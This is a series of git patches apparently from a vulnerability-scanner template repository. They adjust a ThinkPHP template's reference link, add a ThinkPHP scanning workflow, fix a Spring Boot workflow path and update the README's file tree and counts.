diff --git a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
index 82ed0747f9..bb06b729d1 100755
--- a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
@@ -5,9 +5,8 @@ info:
   author: dr_set
   severity: critical
   description: Verbose SQL error message reveals sensitive information including database credentials.
-  
-  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
-  
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
+
 requests:
   - method: GET
     path:

From 936f01a84db00c2375abe8c960c3b58b34a6dcd5 Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Tue, 19 Jan 2021 15:05:55 +0530
Subject: [PATCH 83/85] adding thinkphp workflow

---
 workflows/thinkphp-workflow.yaml | 13 +++++++++++++
 1 file changed, 13 insertions(+)
 create mode 100644 workflows/thinkphp-workflow.yaml

diff --git a/workflows/thinkphp-workflow.yaml b/workflows/thinkphp-workflow.yaml
new file mode 100644
index 0000000000..8282437e2a
--- /dev/null
+++ b/workflows/thinkphp-workflow.yaml
@@ -0,0 +1,13 @@
+id: thinkphp-workflow
+info:
+  name: ThinkPHP Security Checks
+  author: dr_set
+  description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target.
+
+workflows:
+
+  - template: technologies/tech-detect.yaml
+    matchers:
+      - name: thinkphp
+        subtemplates:
+          - template: vulnerabilities/thinkphp/
\ No newline at end of file

From 18ffc0c2674294e63f27e7ed13f68f55b393b8ee Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 19 Jan 2021 09:37:13 +0000
Subject: [PATCH 84/85] Auto Update README [Tue Jan 19 09:37:13 UTC 2021]
 :robot:

---
 README.md | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 4ce6d72fc7..c5b20c6609 100644
--- a/README.md
+++ b/README.md
@@ -34,7 +34,7 @@ An overview of the nuclei template directory including number of templates assoc
 | fuzzing         | 5           | helpers          | 3        |
 | miscellaneous   | 14     | misconfiguration | 37 |
 | takeovers       | 1         | technologies     | 44     |
-| vulnerabilities | 62 | workflows        | 16        |
+| vulnerabilities | 66 | workflows        | 17        |
 
 
 **Tree structure of nuclei templates:**
@@ -534,6 +534,11 @@ An overview of the nuclei template directory including number of templates assoc
 │   ├── springboot
 │   │   ├── springboot-actuators-jolokia-xxe.yaml
 │   │   └── springboot-h2-db-rce.yaml
+│   ├── thinkphp
+│   │   ├── thinkphp-2-rce.yaml
+│   │   ├── thinkphp-5022-rce.yaml
+│   │   ├── thinkphp-5023-rce.yaml
+│   │   └── thinkphp-509-information-disclosure.yaml
 │   ├── vmware
 │   │   ├── vmware-vcenter-lfi-linux.yaml
 │   │   └── vmware-vcenter-lfi.yaml
@@ -568,13 +573,14 @@ An overview of the nuclei template directory including number of templates assoc
     ├── sap-netweaver-workflow.yaml
     ├── solarwinds-orion-workflow.yaml
     ├── springboot-workflow.yaml
+    ├── thinkphp-workflow.yaml
     ├── vbulletin-workflow.yaml
     └── wordpress-workflow.yaml
 ```
 
 </details>
 
-**53 directories, 474 files**.
+**54 directories, 479 files**.
 
 📖 Documentation
 -----

From 741d05a4c0bae53aa9d735c1fc444b863c6ffd94 Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Tue, 19 Jan 2021 17:17:14 +0530
Subject: [PATCH 85/85] misc fix

---
 workflows/springboot-workflow.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml
index 996a91be43..110835f2f1 100644
--- a/workflows/springboot-workflow.yaml
+++ b/workflows/springboot-workflow.yaml
@@ -10,7 +10,7 @@ info:
 
 workflows:
 
-  - template: security-misconfiguration/springboot-detect.yaml
+  - template: misconfiguration/springboot-detect.yaml
     subtemplates:
       - template: cves/2018/CVE-2018-1271.yaml
       - template: cves/2018/CVE-2018-1271.yaml